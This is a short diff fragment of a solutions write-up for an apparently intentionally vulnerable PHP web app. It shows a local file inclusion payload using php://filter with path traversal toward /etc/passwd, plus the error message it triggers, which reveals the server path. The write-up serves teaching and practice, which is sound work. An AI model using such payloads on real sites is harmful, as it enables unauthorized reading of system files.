lucasmartinelle/AnotherVulnerableWebApp/Writeup/Solutions.md

 php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
 ```

 Instead of returning the contents of the `/etc/passwd` file, the application will display an error message.
-This not only confirms that the application is in PHP, but also allows us to get the full path to the application, which is useful to better exploit the BIA and also to get information about the logic of the application.
+This not only confirms that the application is in PHP, but also allows us to get the full path to the application, which is useful to better exploit the LFI and also to get information about the logic of the application.
 This single message allows us to see that the application seems to use a VCM architecture.

 ```php
 **Warning**: file_get_contents(): open_basedir restriction in effect.
 File(../../../../../../../../../etc/passwd) is not within the allowed path(s): (/var/www//:/usr/lib/php/:/tmp/) in **/var/www/domain.tld/controllers/controllerDashboard.php** on line **70**